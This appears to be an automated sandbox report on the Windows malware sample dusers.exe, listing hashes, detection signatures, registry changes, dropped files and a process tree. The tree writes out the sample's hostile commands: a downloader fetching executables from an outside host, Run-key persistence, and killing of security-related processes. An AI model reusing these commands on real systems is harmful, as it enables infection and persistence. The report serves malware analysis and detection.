Analysis
-
max time kernel
90s -
max time network
50s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
22-05-2022 05:23
Static task
static1
Behavioral task
behavioral1
Sample
dusers.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
dusers.exe
Resource
win10v2004-20220414-en
General
-
Target
dusers.exe
-
Size
207KB
-
MD5
80adc9e5666a4b94fe1637f92d0611b0
-
SHA1
478bb364184d882005d0503c91a9929d81e89765
-
SHA256
eb9a70ac0d1f7c413f10f5308bda81e1da5a9b5bfd2ab7c8d89232eada71c143
-
SHA512
f7eac083f93f5022d8a580303a16c1e12532f6c0dc89e338eb7585d5233c52f39fa7b3e06c06511e6dc68e398151be30074346e66eaccb972f1c497a893d88de
Malware Config
Extracted
C:\Users\Admin\AppData\Roaming\Macromedia\index.html
Signatures
-
suricata: ET MALWARE BePush/Kilim payload retrieval
suricata: ET MALWARE BePush/Kilim payload retrieval
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Executes dropped EXE 7 IoCs
Processes:
Users.exewmild.exewmild.exewmild.exewmild.exewmild.exewmild.exepid process 1996 Users.exe 1912 wmild.exe 1588 wmild.exe 1756 wmild.exe 1780 wmild.exe 1288 wmild.exe 1464 wmild.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Users.exe upx C:\Users\Admin\AppData\Local\Temp\Users.exe upx C:\Users\Admin\AppData\Local\Temp\Users.exe upx -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 944 cmd.exe -
Loads dropped DLL 8 IoCs
Processes:
cmd.execmd.exepid process 944 cmd.exe 2004 cmd.exe 2004 cmd.exe 2004 cmd.exe 2004 cmd.exe 2004 cmd.exe 2004 cmd.exe 2004 cmd.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\software\microsoft\windows\currentversion\run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1512 taskkill.exe 1144 taskkill.exe 2020 taskkill.exe 1312 taskkill.exe 1220 taskkill.exe -
Processes:
explorer.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 34 IoCs
Processes:
explorer.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c003100000000008e54ce9e100041646d696e00380008000400efbe8e5421908e54ce9e2a0000002e000000000004000000000000000000000000000000410064006d0069006e00000014000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 52003100000000008e54dd9d1020526f616d696e67003c0008000400efbe8e5421908e54dd9d2a000000ee01000000000200000000000000000000000000000052006f0061006d0069006e006700000016000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 5a00310000000000b654272b10204d4143524f4d7e310000420008000400efbe8e547c91b654272b2a00000070f800000000010000000000000000000000000000004d006100630072006f006d006500640069006100000018000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 52003100000000008e542190122041707044617461003c0008000400efbe8e5421908e5421902a000000ed0100000000020000000000000000000000000000004100700070004400610074006100000016000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 74003100000000008e5421901100557365727300600008000400efbeee3a851a8e5421902a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe -
Modifies registry key 1 TTPs 4 IoCs
Processes:
reg.exereg.exereg.exereg.exepid process 2036 reg.exe 1736 reg.exe 1728 reg.exe 1764 reg.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 652 PING.EXE 1352 PING.EXE 868 PING.EXE 1988 PING.EXE -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 1144 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 1312 taskkill.exe Token: SeDebugPrivilege 1220 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
dusers.execmd.exeUsers.execmd.exedescription pid process target process PID 960 wrote to memory of 944 960 dusers.exe cmd.exe PID 960 wrote to memory of 944 960 dusers.exe cmd.exe PID 960 wrote to memory of 944 960 dusers.exe cmd.exe PID 960 wrote to memory of 944 960 dusers.exe cmd.exe PID 944 wrote to memory of 1996 944 cmd.exe Users.exe PID 944 wrote to memory of 1996 944 cmd.exe Users.exe PID 944 wrote to memory of 1996 944 cmd.exe Users.exe PID 944 wrote to memory of 1996 944 cmd.exe Users.exe PID 944 wrote to memory of 1352 944 cmd.exe PING.EXE PID 944 wrote to memory of 1352 944 cmd.exe PING.EXE PID 944 wrote to memory of 1352 944 cmd.exe PING.EXE PID 944 wrote to memory of 1352 944 cmd.exe PING.EXE PID 1996 wrote to memory of 2004 1996 Users.exe cmd.exe PID 1996 wrote to memory of 2004 1996 Users.exe cmd.exe PID 1996 wrote to memory of 2004 1996 Users.exe cmd.exe PID 1996 wrote to memory of 2004 1996 Users.exe cmd.exe PID 2004 wrote to memory of 772 2004 cmd.exe chcp.com PID 2004 wrote to memory of 772 2004 cmd.exe chcp.com PID 2004 wrote to memory of 772 2004 cmd.exe chcp.com PID 2004 wrote to memory of 772 2004 cmd.exe chcp.com PID 2004 wrote to memory of 868 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 868 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 868 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 868 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 1912 2004 cmd.exe wmild.exe PID 2004 wrote to memory of 1912 2004 cmd.exe wmild.exe PID 2004 wrote to memory of 1912 2004 cmd.exe wmild.exe PID 2004 wrote to memory of 1912 2004 cmd.exe wmild.exe PID 2004 wrote to memory of 1588 2004 cmd.exe wmild.exe PID 2004 wrote to memory of 1588 2004 cmd.exe wmild.exe PID 2004 wrote to memory of 1588 2004 cmd.exe wmild.exe PID 2004 wrote to memory of 1588 2004 cmd.exe wmild.exe PID 2004 wrote to memory of 656 2004 cmd.exe reg.exe PID 2004 wrote to memory of 656 2004 cmd.exe reg.exe PID 2004 wrote to memory of 656 2004 cmd.exe reg.exe PID 2004 wrote to memory of 656 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1988 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 1988 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 1988 2004 cmd.exe PING.EXE PID 2004 wrote to memory of 1988 2004 cmd.exe PING.EXE PID 944 wrote to memory of 908 944 cmd.exe explorer.exe PID 944 wrote to memory of 908 944 cmd.exe explorer.exe PID 944 wrote to memory of 908 944 cmd.exe explorer.exe PID 944 wrote to memory of 908 944 cmd.exe explorer.exe PID 2004 wrote to memory of 2036 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2036 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2036 2004 cmd.exe reg.exe PID 2004 wrote to memory of 2036 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1692 2004 cmd.exe find.exe PID 2004 wrote to memory of 1692 2004 cmd.exe find.exe PID 2004 wrote to memory of 1692 2004 cmd.exe find.exe PID 2004 wrote to memory of 1692 2004 cmd.exe find.exe PID 2004 wrote to memory of 1464 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1464 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1464 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1464 2004 cmd.exe reg.exe PID 2004 wrote to memory of 1512 2004 cmd.exe taskkill.exe PID 2004 wrote to memory of 1512 2004 cmd.exe taskkill.exe PID 2004 wrote to memory of 1512 2004 cmd.exe taskkill.exe PID 2004 wrote to memory of 1512 2004 cmd.exe taskkill.exe PID 2004 wrote to memory of 1144 2004 cmd.exe taskkill.exe PID 2004 wrote to memory of 1144 2004 cmd.exe taskkill.exe PID 2004 wrote to memory of 1144 2004 cmd.exe taskkill.exe PID 2004 wrote to memory of 1144 2004 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\dusers.exe"C:\Users\Admin\AppData\Local\Temp\dusers.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\move.bat" "2⤵
- Deletes itself
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Users.exeusers.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comCHCP 12515⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/app.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 65⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\reg.exeREG QUERY hkcu\software\microsoft\windows\currentversion5⤵
- Modifies registry key
-
C:\Windows\SysWOW64\find.exefind "svr.vbs"5⤵
-
C:\Windows\SysWOW64\reg.exereg delete "hkcu\software\microsoft\windows\currentversion" /v "alg" /f5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz2.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvidsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im safesurf.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im surfguard.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f5⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f5⤵
- Modifies registry key
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/ASUFUSER.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Macromedia\nobuf.vbs"5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" "javascript:clipboardData.setData('text','5G#JBNGAJAT2tQ^@I@3PJX#)$JHZZTCE');close();"6⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f5⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/raauser.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/amsql.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/prochack.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 205⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\JetSwap /f5⤵
- Modifies registry key
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\Macromedia3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Users.exeFilesize
143KB
MD5f281cf95dc213f2bff31707319f12e52
SHA1cdf5667a12476eb13832e841b84fe7e06f69ef80
SHA2567d4b48559eea4f796bcae254548be0e843d58def5dedc0595b2623afc39cb8b3
SHA512bc8ebc87e7805f606faf50a6f6d96ed04ebb9f300ac40c6d6763f8e0dedf0a0e500c6f4d49373f5a639f4b06e02e81faf88658a93c62d4cfe520f2b445d63b33
-
C:\Users\Admin\AppData\Local\Temp\Users.exeFilesize
143KB
MD5f281cf95dc213f2bff31707319f12e52
SHA1cdf5667a12476eb13832e841b84fe7e06f69ef80
SHA2567d4b48559eea4f796bcae254548be0e843d58def5dedc0595b2623afc39cb8b3
SHA512bc8ebc87e7805f606faf50a6f6d96ed04ebb9f300ac40c6d6763f8e0dedf0a0e500c6f4d49373f5a639f4b06e02e81faf88658a93c62d4cfe520f2b445d63b33
-
C:\Users\Admin\AppData\Local\Temp\move.batFilesize
156B
MD5cfa0da234e0434f0a9b092989956227e
SHA1138abe1853d92bca4869b481087f627dd557229f
SHA25618d5ef0656e401c842a0eb28ff3bc1e46887e7631eea747c6ae773538c13ed40
SHA51295da985ab1ea9ab1ab264b7b799a19e784dcc15e2369a771b49f31dbfd1649a9940ad241c7e89ea4e0d1b96ed8e91ba48ef816431731218fffcad03972909f93
-
C:\Users\Admin\AppData\Roaming\Macromedia\SER.batFilesize
2KB
MD53e4d4cb6c7e82472a7ff63d486bb0566
SHA14b4f7012671f29728065320284ef1b1302a43f78
SHA25627ed1a433e8c6053b348fa5b00c2bfcfd8e5d2d72ca47b496b74d26af0c36532
SHA512d1798d87f09c25f0609a08007ed832a0402f964c570b96f8906b0295b41ac4ce0132c34b5206c8dfc3f60e911bb4b4d2693829354414aefae201869c296e1ee5
-
C:\Users\Admin\AppData\Roaming\Macromedia\alg.vbsFilesize
46B
MD55f193e93167de42dfab747955d0e6d0e
SHA1d6971d5b4ae136872e52175f72ac0ec8d3183c6c
SHA256bbefbab236a4cda44a9def4c80d742eeedcab2e52071b5152be0e0a881346288
SHA512c4b5c915fa426ce61f24916e67c185f92ef04bcd3efe90ba824dac478f251355b401bdcf68578588e28bac0ad0ff50414267d5c7d5b94c536e8529dd9da6783b
-
C:\Users\Admin\AppData\Roaming\Macromedia\algsvr.vbsFilesize
50B
MD5e368ac11d2c564f5296c10d71ffc5d4f
SHA13c2eeaba96b20c8bd401236a219ad59a7b22c229
SHA25690433b1f4b903a501570be197f572d2275745f0c417c1800dc1b7a1af3ba98ac
SHA5121e024a1b5da60a603f51667ddae2b07976ceebcf0926c0b5527bff855f273573e86ae52539c15241963a739fc5fb5c8c0f5ac599f1fc2f3a37b66989a328d84e
-
C:\Users\Admin\AppData\Roaming\Macromedia\amsql.batFilesize
226B
MD5efcbf17292ced26c3517b794b3d3f4c2
SHA1dd1e0320ec14d9849ab4e3fa9596d006412e9004
SHA256e57a6b5469bebc596fd137c4dacc912a8451af7e99697ea5e9897b619b2fe3fe
SHA51293ee1aaaec6ddc37bdf1eb69e7362b7ffa8e2ffa9827a1e3f308af10f24207c1d1c62d6a3966aef110c8f40c379d69171dd3701b921d94175e49aad13ebc1412
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD5a1a36222d3fdcb01f144cad89392c30f
SHA1f74ac81ae6788f44185892b862324740934679cc
SHA256d0071802dca50e3dbca3e019fcadc63734972d172b1396dfb1ab4ac653743b1d
SHA5123f4cb9ffa778001ce49ce54d03cc69a193296e5a04ee5a5e87f64a76ede385d6238a266392674ab76550b82b7fe3bc3b28063620b3dcaa21e96aee13cb548817
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD5a3c4ed0071a6df1a61bc11becfd80a5a
SHA127c97e2a70e4199c0f751bf1854edce81701f8a0
SHA256d6d629b7005772c7e47610a31bf4f39fd73e2e5efa38ac87f3466dbe744c0ba3
SHA512f59432063e9f6e9e406293fd6ad017649912219ad6abf0768ec23040671bec351e93a38b0cb63d4414e10bdd6fe2954ef0635c7fb5c2cc24be0ea50b7696aed7
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD541f3ecd71eaf02ea9598fc6b9e5ea2f9
SHA1397800fa7b884e9ce71e26f9a8b68fc30d83586d
SHA256d9630a413a06e5d59a619295caae55f9dab21dac143c7c3a251ca37bd67fc463
SHA5125abca7ca4a8192c3e7800db2f71b8d4012aa93ca9ecc0bab7e375f4c0e3d08aab03e81a213ce36bf99a93cf4386f614f81b7e83d98d7bb160609db9ede94c61a
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD5fd94ad14f45e099ca7c6764f8c7232fb
SHA19ca370110e2ae080beeb4698aee54031d04168dd
SHA2562b976900b8e61118e528c047b3fab3ed06950dbbeb407e126c8d15db77e91847
SHA5129c18bd50f6d26a8a0b996ab638fe721e255ea7903c797fa5e927375ce2c45fe23370ad061ad6da38acd63816e3fa348b6ea37e07d357e3f2e62fd82de01d115b
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD503740bf8e40f7c348d3d1b4224e2910f
SHA1e774e0c20c9dfd6c2e13c102de77c478db500e55
SHA2560d90b5119ca444135473253bae45e9891bb7b1863fcc45d4dca3e4a10d134831
SHA512b74fddc6b94d56b317787b288f85d4382ac24a6dd6f65042828aba6107f8b06112e6810aff6c54f889db0a13f33b711d3af8821829d8fac40ecf2cb75ad7a7f0
-
C:\Users\Admin\AppData\Roaming\Macromedia\index.htmlFilesize
23KB
MD56865d48abfeb78eb0f703da6679c6656
SHA194951df5dfcf4ac9f145a7967f347470c4822c23
SHA256330ed73d278348afd86851addd5462a40c89f68b1707fc70b5756b85438b2407
SHA512dc70eb419d6dc34c0ccba9ec26f76e77fbf7a2cb3a4a823383ccadd3dd16b8e4c1915cc250d91b477f171a29eddfb94ffc9cdcb5548dd18ee5e905fdbacd5042
-
C:\Users\Admin\AppData\Roaming\Macromedia\nobuf.vbsFilesize
180B
MD501c573bf7073b7a63bab7d231578c9f0
SHA142a3982701f3c7d90ac8ea2350a0540a4477eaa7
SHA256de9f70f7e727f91adcb411507a685c3eee220e06b440ee69d7cfde62ef0809ad
SHA512fce42b5fed68bbe3c3105395265fde3413d1ccb9419a9983d88b2f0f606f0fb34853580278e95087c8a6197fe4a97fc7c037ef0e6351f594add3808964d26df0
-
C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbsFilesize
142B
MD568ef63c560cb92331c87ee8d7d66be5f
SHA17a3a02a84f759ea3df53ed841189a51085e4f012
SHA2566244a594ab0706c888339de2442ec9a0c96ea76e10fd43e09be5747186e9e238
SHA51255535e2bceba6dceccfd41bb97259782a3adeacda16166eff719842cd210c238b43a114ddc604a2ad442521451ff813e6b3d7d03777f6c099daffd33bbfd037d
-
C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbsFilesize
48B
MD5261d3d4bc3866db56a9c11be72935518
SHA1d64ad326c6e434684c9e7acd4d28392c445ce997
SHA256a7c9e209ae5f30ab312d1d71b94968c9cdfc00b6ea46c24493e0a1ef0e10b335
SHA5125dc5110db87459764c8a7d2e71056a4cc713ec7d546aef7d7a0883f70927dcf182fd1705763396eb6668e76fa3cd95cc6ac9b513235d01431967bc64028f999a
-
C:\Users\Admin\AppData\Roaming\Macromedia\testFilesize
8B
MD53991e06e96eff479cfb094c931a37b7f
SHA1c9e1afb4aa1328042024e04ccee8710cf5a36c8c
SHA256cdd379977aa8c23fb9d13653ddf085aa6e1ca16d8fe327b6275cd9465aae2689
SHA5122239b03e088c7fd8acbfd5631b72d6aee0e2adb1deb6bebfcc3c7c604c1024e1c7455a4dd3566b2932b8df860257707c974ec77e7087b7c2dce598343b42ba9e
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exeFilesize
159KB
MD5f9f8d1c53d312f17c6f830e7b4e6651d
SHA16b3eb6069b69fbcfa6e1e9c231ce95674d698f51
SHA256bedfbfe249b4a2be35bbfb1cf166d2119e132ee7c608909d34238e9eba6c9749
SHA512ceb9b35ea3876ab57a6e0213afbb6914f8e5d448189e5e3caa7ea1709153596ea90f5e7c2031bc0f6f0b45771dc7f9721c5337c8665fc3d1ed1cef4ae8ab964a
-
